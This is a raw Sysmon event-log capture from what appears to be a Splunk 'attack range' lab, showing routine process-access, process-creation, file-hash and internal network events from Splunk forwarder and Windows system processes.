11:28:46.668{4F8D34B0-F11E-6215-2B00-000000003902}27842804C:\Windows\system32\conhost.exe{4F8D34B0-1A6E-6216-6505-000000003902}3424C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000223451Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:28:46.668{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000223450Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:28:46.668{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000223449Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:28:46.668{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000223448Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:28:46.668{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000223447Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:28:46.668{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000223446Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:28:46.668{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000223445Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:28:46.668{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000223444Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:28:46.668{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000223443Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:28:46.668{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000223442Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:28:46.668{4F8D34B0-F11B-6215-0500-000000003902}4121208C:\Windows\system32\csrss.exe{4F8D34B0-1A6E-6216-6505-000000003902}3424C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000223441Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:28:46.668{4F8D34B0-F11D-6215-2300-000000003902}20363828C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{4F8D34B0-1A6E-6216-6505-000000003902}3424C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000223440Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:28:46.669{4F8D34B0-1A6E-6216-6505-000000003902}3424C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{4F8D34B0-F11B-6215-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{4F8D34B0-F11D-6215-2300-000000003902}2036C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000223439Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:28:46.590{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7E87630A9BCA71D8F00D398B32281819,SHA256=07196F7ADA699FDAA7A4CEA161B96A1B8A15D59993A6E2CEF8D67C315055C1A3,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000299614Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:28:46.322{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=16C93E9B8816DF9957F63D0169A36511,SHA256=476EDCA813C02925013D1A1DD735785257FEB97AEFB738CA06407215A1147AAB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000223470Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:28:47.872{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=084E9AC8CA9838BB47A2183B756C446B,SHA256=364926D902E6DFC1A8950A7CA6657FDD16C8E5F102ED1E2498C199F78A8E9C1F,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000223469Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:28:45.531{4F8D34B0-F12B-6215-5B00-000000003902}3916C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-tcontreras-attack-range-985.eu-central-1.compute.internal51788-false10.0.1.12-8000- 23542300x8000000000000000223468Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:28:47.856{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=DA1C45365B64DEF11D419A577057A240,SHA256=CFB9CB3AA83309A3B976EAF5826A9F28CF6AB8D748AC5C719616ED87193AC642,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000299615Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:28:47.337{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9A007CB182B30932CE3DF11018CA83A4,SHA256=5AB8CBACAFB9327E2C4B5027F51EA96857D5405200EB5E54AB7901F032660FB6,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000223467Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:28:47.435{4F8D34B0-1A6F-6216-6605-000000003902}22483552C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{4F8D34B0-F11D-6215-2300-000000003902}2036C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000223466Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:28:47.199{4F8D34B0-F11E-6215-2B00-000000003902}27842804C:\Windows\system32\conhost.exe{4F8D34B0-1A6F-6216-6605-000000003902}2248C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000223465Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:28:47.199{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000223464Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:28:47.199{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000223463Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:28:47.199{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000223462Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:28:47.199{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000223461Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:28:47.199{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000223460Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:28:47.199{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000223459Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:28:47.199{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000223458Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:28:47.199{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000223457Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 